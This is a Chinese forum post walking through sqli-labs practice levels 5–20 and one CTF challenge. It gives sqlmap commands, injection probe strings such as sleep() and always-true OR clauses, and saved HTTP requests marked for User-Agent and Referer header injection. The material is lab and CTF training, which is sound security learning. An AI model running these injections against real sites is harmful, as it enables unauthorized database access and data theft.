用户
搜索
  • TA的每日心情
    奋斗
    2018-9-19 12:39
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    8

    主题

    20

    帖子

    234

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2018-1-28

    i春秋签约作者

    发表于 2018-8-17 14:37:22 611043

    个人简介:
    渣渣一枚,萌新一个,会划水,会喊六六
    本人博客:https://www.cnblogs.com/lxz-1263030049/
    关于sqli-labs的解题技巧,使用sqlmap注入,尽量少使用手工注入的方式
    关于sql-labs中的1-4我已经在另一篇文章中写出具体的过程:
    https://www.cnblogs.com/lxz-1263030049/p/9363151.html

    sqli-labs:5-9题 判断注入方式

    具体判断方式如下:
    1:用于验证时间延迟型的盲注:?id=1’ and sleep(5) --+
    2:用于判断布尔型盲注: ?id=1’ and 1=1 --+ , ?id=1' and 2=1 --+
    再根据回显的不同进行判断:
    主要使用的语句:
    sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0
    或者:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs --batch
    其中的—technique是为sqlmap中的注入技术,在sqlmap中其支持5中不同模式的注入
    B:Boolean-based-blind  (布尔型型注入)
    E:Error-based(报错型注入)
    U:Union query-based(联合注入)
    S:Starked queries  (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)
    T:Time-based blind (基于时间延迟注入)
    我们可以根据不同的报错提示更改—technique后面的字母
    其中的—dbms: 不仅可以指定数据库类型,还可以指定数据库版本
    --batch: 用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。
    -v 0参数只是为了更好的截图.

    第八题:盲注 - 基于布尔值 - 单引号 - 字符串:

    使用语句为:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs –batch
    图片 1.png
    2.png
    或者使用语句:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --current-db --threads 10 --batch --technique BES
    3.png
    4.png
    就可以得到数据库的信息

    第九题:盲注 - 基于时间 - 单引号 - 字符串:

    属于延迟注入的题目(具体判断方法上面已经给出)同样也可以使用上面类似的语句:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T --dbs --batch -v 0

    第11-17题:

    都是属于post注入的问题,只是内部参杂着盲注的问题,需要使用burp火狐浏览器的HackBar都是可以的·

    第十一题:post注入,基于错误 - 字符型:

    6.png
    根据post回显的值就可以进行sqlmap的跑测

    使用的语句为:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=11111 &passwd=111111 &submit=Submit" --dbs --threads 10 --batch --technique ES
    其中的:
    --data:后面可以加上数据段(post/get类型的都是可以的)
    --threads:最大并发线程,盲注时每个线程获取一个字符(7此请求),获取完成后线程结束,默认为1,建议不要超过10,否则可能影响站点可用性
    7.png
    8.png

    下面的只是需要常规的操作就可以了

    第十二题:基于错误 - 双引号 - 字符串:

    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname= ")or ("1")=("1 &passwd= ")or ("1")=("1 &submit=Submit " --dbs --threads 10 --batch --technique E
    9.png
    或者使用语句:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname=")or("1")=("1&passwd=")or("1")=("1&submit=Submi" --dbs --threads 10 --batch --technique BES
    10.png
    11.png

    第十三题:双注入 - 字符型 - 变形

    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 10 --batch --technique EBS
    12.png
    13.png
    同样也是可以得到答案的(其他几个也是类似的手法)
    简单的说一下关于十五题,毕竟这一题为布尔和时间延迟的盲注,简单的注入语句为:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname='or'1'='1&passwd='or'1'='1&submit=Submit" --dbs --threads 10 --batch --technique BET
    14.png
    15.png

    sqli-labs 18-20,这三题主要是关于http的内容

    常见的HTTP注入点产生位置为【Referer】【X-Forwarded-For】【Cookie】【X-Real-IP】【Accept-Language】【Authorization】

    Sqli-labs 18:报错型,单引号,user-agent型注入点

    16.png
    由于这一题时关于user-agent的注入直接使用语句:
    python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BTES
    关于txt的内容:

    POST /sqli-labs-master/Less-18/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/sqli-labs-master/Less-18/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Connection: close
    Upgrade-Insecure-Requests: 1
    uname=admin&passwd=admin&submit=Submit
    

    就是属于burp里面的内容
    17.png
    18.png
    -r: sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)
    或者也可以这样:
      python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST –batch
    19.png
    20.png

    --user-agent http头会携带一个值,就是user-agent,表示访问的浏览器的信息
    sqlmap检查uesr-agent中的注入点,
    lever>=3才会去检查user-agent头是否存在注入漏洞

    第十九题:报错型,单引号,referer型注入点

    这一题的做法如同上一题一样都可以使用:
    python sqlmap.py -r 1.txt --dbs --threads 10 --batch --technique BEST
    只是存为1.txt的文档变成了这个:

    POST /sqli-labs-master/Less-19/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/sqli-labs-master/Less-19/*
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    uname=admin&passwd=admin&submit=Submit

    另外也可以使用这样的语句跑出数据库:
    python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer=" http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 10 --technique BEST –batch
    21.png
    22.png
    至于里面的一些内容上面已经有一些介绍了

    第二十题:报错型,单引号,cookie型注入

    对于最后一题,我就用一个最近一个看到的一题结束吧
    题目链接:http://202.112.51.184:16080/
    23.png
    直接进行抓包看一下:
    24.png

    Cookie有问题,直接使用sqlmap进行注入‘
    python sqlmap.py -u "http://202.112.51.184:16080/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" –dbs
    25.png
    26.png
    27.png

    --cookie
    web应用基于cookie的身份验证,对于post请求,可以指定```
    cookie
    sqlmap -u "url" --cookie="..." --level 3 –dbs

    [/md]

    看来我是沙发喽
    使用道具 举报 回复
    学习一下~
    使用道具 举报 回复
    兄弟估计手上有一本书叫web安全攻防吧,
    使用道具 举报 回复
    发表于 2018-8-19 21:48:29
    一个小逗比 发表于 2018-8-19 17:23
    兄弟估计手上有一本书叫web安全攻防吧,

    没有只是最近在学习关于CTF的知识
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2018-8-22 10:37:17
    666666666666666666
    路漫漫,
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册